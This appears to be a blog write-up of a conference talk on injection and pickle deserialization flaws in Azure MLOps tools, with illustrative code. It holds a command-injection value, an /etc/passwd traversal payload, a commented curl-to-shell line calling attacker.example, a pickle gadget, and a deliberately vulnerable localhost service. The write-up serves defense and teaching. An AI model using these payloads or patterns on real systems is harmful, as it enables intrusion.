The Oversights under The Flow: Discovering and Demystifying the Vulnerable Tooling Suites from Azure MLOps
This talk demonstrates multiple command injection and path traversal vulnerabilities within Azure MLOps tooling suites, including PromptFlow, DeepSpeed, and TorchGeo. The research highlights how insecure use of Python's subprocess and pickle modules in these tools allows for remote code execution and privilege escalation. The speaker emphasizes the critical need for secure coding practices in machine learning infrastructure and the limitations of current automated security auditing tools. The presentation includes several proof-of-concept exploits targeting these vulnerabilities.
Remote Code Execution via Insecure Deserialization in Azure MLOps Tooling
TLDR: Recent research into Azure MLOps tooling reveals critical vulnerabilities in popular libraries like PromptFlow, DeepSpeed, and TorchGeo. Attackers can leverage insecure use of Python's subprocess and pickle modules to achieve remote code execution or privilege escalation. Pentesters should prioritize auditing MLOps pipelines for these injection vectors, while developers must move away from dangerous functions like eval() and pickle.load() in favor of safer alternatives.
Machine learning infrastructure is the new frontier for supply chain attacks. While security teams scramble to secure LLM prompts and model weights, the underlying tooling suites—the very software used to build, test, and deploy these models—are often left wide open. The research presented at Black Hat 2025 on Azure MLOps tooling proves that we are repeating the same mistakes in the AI space that we made in web development a decade ago.
The Mechanics of the Failure
The core issue identified in tools like PromptFlow and DeepSpeed is a fundamental failure to treat user-controlled input as untrusted. In many cases, these tools take configuration parameters or file paths from a user and pass them directly into dangerous Python functions.
Take the command injection vulnerability found in PromptFlow. The application uses Python’s subprocess.Popen to execute system commands, but it fails to properly sanitize the arguments. By manipulating the input, an attacker can break out of the intended command structure. The talk demonstrated a proof-of-concept where an attacker triggers a touch /tmp/hacked command, confirming that the shell is executing arbitrary input. This is a classic OWASP A03:2021-Injection scenario, but it is happening inside a specialized machine learning environment where security controls are often weaker.
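The pattern is easy to illustrate. The sketch below is not PromptFlow's actual code; it is a minimal, hypothetical reconstruction of the vulnerable pattern, using an invented flow-name parameter, that shows why string interpolation into a shell command fails where an argument vector (or shlex.quote) does not:

```python
import shlex

def build_command_unsafe(flow_name: str) -> str:
    # VULNERABLE: string interpolation into a shell command line. An input
    # like "demo; touch /tmp/hacked" injects a second command when the
    # string is later executed with subprocess.run(..., shell=True).
    return f"pf run --name {flow_name}"

def build_command_safe(flow_name: str) -> list[str]:
    # SAFER: an argument vector passed to subprocess.run(argv) is handed to
    # the OS directly; no shell ever parses the user-supplied value, so
    # metacharacters like ";" stay part of the literal argument.
    return ["pf", "run", "--name", flow_name]

def build_command_quoted(flow_name: str) -> str:
    # Alternative when a shell string is unavoidable: shlex.quote wraps the
    # value so shell metacharacters are neutralized.
    return f"pf run --name {shlex.quote(flow_name)}"

payload = "demo; touch /tmp/hacked"
# subprocess.run(build_command_unsafe(payload), shell=True) -> runs touch
# subprocess.run(build_command_safe(payload)) -> treats payload as a literal name
```

The safe variant never gives the shell a chance to interpret the input, which is why argument vectors are the default recommendation over shell strings.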
The situation is even more dire with DeepSpeed, which suffers from insecure deserialization. The library uses the pickle module to handle data transfers between distributed training nodes. As any experienced researcher knows, pickle is inherently unsafe. If an attacker can influence the serialized data stream, they can force the application to execute arbitrary code upon deserialization. This is a textbook OWASP A08:2021-Software and Data Integrity Failures.
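Why is pickle inherently unsafe? Because deserialization is code execution by design: an object's __reduce__ method tells the loader which callable to invoke to reconstruct it. The sketch below demonstrates the mechanism with a harmless stand-in callable (a real exploit would return something like os.system with a shell command):

```python
import operator
import pickle

class Payload:
    # pickle calls __reduce__ during serialization; the (callable, args)
    # tuple it returns instructs the DESERIALIZER to call that function.
    def __reduce__(self):
        # Harmless stand-in for demonstration. A real attacker returns
        # e.g. (os.system, ("curl attacker.example | sh",)).
        return (operator.add, (40, 2))

blob = pickle.dumps(Payload())
restored = pickle.loads(blob)  # the loader executes operator.add(40, 2)
print(restored)                # -> 42: an arbitrary callable ran on load
```

Note that the victim never has to use the Payload class; the attacker only needs to get the malicious bytes into any pickle.loads() call, which is exactly the position a node in a distributed training cluster is in.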
From Local to Remote: The 1-Click Trap
One of the most compelling parts of this research is how it bridges the gap between a "local" vulnerability and a remote exploit. Many of these tools, such as the Azure CLI extensions, are designed to listen on localhost by default. Developers often assume that because the service is bound to 127.0.0.1, it is safe from external threats.
This assumption is dangerous. If a developer visits a malicious website while their local MLOps service is running, that site can use JavaScript to send requests to the local port. This is the "1-click" attack vector. The browser acts as a proxy, sending the malicious payload to the local service. If the service is vulnerable to command injection or path traversal, the attacker gains a foothold on the developer's machine. This is exactly what happened with CVE-2024-43591, where improper handling of commands allowed for potential exploitation.
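To make the failure mode concrete, here is a minimal, entirely hypothetical sketch of such a localhost-bound helper service (the port, endpoint, and cmd parameter are invented for illustration). Any page open in the developer's browser can reach it with a simple cross-origin request:

```python
import subprocess
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import parse_qs, urlparse

def extract_cmd(path: str) -> str:
    # Pull the attacker-controllable "cmd" parameter out of the URL.
    return parse_qs(urlparse(path).query).get("cmd", [""])[0]

class DevToolHandler(BaseHTTPRequestHandler):
    # Hypothetical local MLOps helper: binds to 127.0.0.1 and "trusts"
    # every request because it assumes only the developer can reach it.
    def do_GET(self):
        cmd = extract_cmd(self.path)
        # VULNERABLE: a malicious web page can issue
        # fetch("http://127.0.0.1:8765/?cmd=...") and drive this endpoint,
        # because the browser happily proxies requests to localhost.
        subprocess.run(cmd, shell=True)
        self.send_response(200)
        self.end_headers()

# HTTPServer(("127.0.0.1", 8765), DevToolHandler).serve_forever()
```

Binding to 127.0.0.1 restricts which network interfaces can reach the socket, not which principals: the developer's own browser is on the right side of that boundary and will execute attacker-supplied JavaScript.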
Auditing Your Pipeline
If you are performing a penetration test on an organization that uses these tools, stop looking only at the web application. Start looking at the MLOps pipeline.
- Map the attack surface: Identify every tool in the pipeline that accepts configuration files, YAML manifests, or serialized data.
- Test for injection: Use standard payloads to see if you can trigger unexpected behavior in the underlying OS. If a tool takes a file path, try a path traversal payload like ../../../../etc/passwd.
- Check for deserialization: If you see any evidence of pickle, marshal, or shelve being used to load data, you have a high-probability RCE vector.
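When you have source access, the deserialization check can be partially automated. This is a rough sketch (not a replacement for manual review) that walks a Python file's AST and flags the usual RCE sinks: eval/exec, pickle/marshal/shelve loaders, and subprocess calls with shell=True:

```python
import ast

DANGEROUS_CALLS = {"eval", "exec"}
DANGEROUS_ATTRS = {
    ("pickle", "load"), ("pickle", "loads"),
    ("marshal", "load"), ("marshal", "loads"),
    ("shelve", "open"),
}
SUBPROCESS_FUNCS = {"run", "Popen", "call", "check_output"}

def audit_source(source: str) -> list[tuple[int, str]]:
    """Return (line_number, description) for likely RCE sinks."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if not isinstance(node, ast.Call):
            continue
        func = node.func
        if isinstance(func, ast.Name) and func.id in DANGEROUS_CALLS:
            findings.append((node.lineno, f"call to {func.id}()"))
        elif (isinstance(func, ast.Attribute)
              and isinstance(func.value, ast.Name)
              and (func.value.id, func.attr) in DANGEROUS_ATTRS):
            findings.append((node.lineno, f"{func.value.id}.{func.attr}()"))
        # Separately flag subprocess-style calls that opt into shell parsing.
        if isinstance(func, ast.Attribute) and func.attr in SUBPROCESS_FUNCS:
            for kw in node.keywords:
                if (kw.arg == "shell"
                        and isinstance(kw.value, ast.Constant)
                        and kw.value.value is True):
                    findings.append((node.lineno, f"{func.attr}(shell=True)"))
    return findings
```

A scanner like this only catches the obvious syntactic patterns; it will miss aliased imports and dynamic dispatch, which is precisely where the automated tools discussed in the talk fall short.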
The Defensive Reality
The fix is simple in theory but difficult in practice. Developers must stop using eval(), pickle, and shell-executing functions with unsanitized input. The research showed that even when vendors attempt to patch these issues, they often miss secondary code paths. For example, a patch might fix a vulnerability in one module but leave an identical, vulnerable pattern in a related security module.
Defenders need to implement strict input validation and, where possible, use safer serialization formats like JSON or Protobuf. Furthermore, automated security scanners are currently failing to catch these issues because they often lack the context to understand how these specialized ML libraries interact with the operating system.
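The migration away from pickle is usually less painful than teams expect. A sketch of the safer pattern, using an invented TrainingState structure as a stand-in for whatever a pipeline actually ships between nodes:

```python
import json
from dataclasses import asdict, dataclass

@dataclass
class TrainingState:
    epoch: int
    loss: float
    checkpoint: str

def serialize(state: TrainingState) -> str:
    # JSON carries only data, never code: deserializing it cannot invoke
    # arbitrary callables the way pickle.loads() can.
    return json.dumps(asdict(state))

def deserialize(raw: str) -> TrainingState:
    payload = json.loads(raw)
    # Explicit, typed field extraction replaces pickle's implicit
    # "trust whatever the bytes say" reconstruction.
    return TrainingState(
        epoch=int(payload["epoch"]),
        loss=float(payload["loss"]),
        checkpoint=str(payload["checkpoint"]),
    )
```

The trade-off is that JSON cannot transparently round-trip arbitrary Python objects, so each transferred type needs an explicit schema, and that explicitness is exactly the security property you want.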
We are currently in a "Wild West" phase for AI infrastructure. The tools are being built for speed and functionality, with security as an afterthought. As a researcher or pentester, your goal should be to find these oversights before they are weaponized in the wild. If you find a tool that is "automating" your ML workflow, assume it is doing so insecurely until you prove otherwise.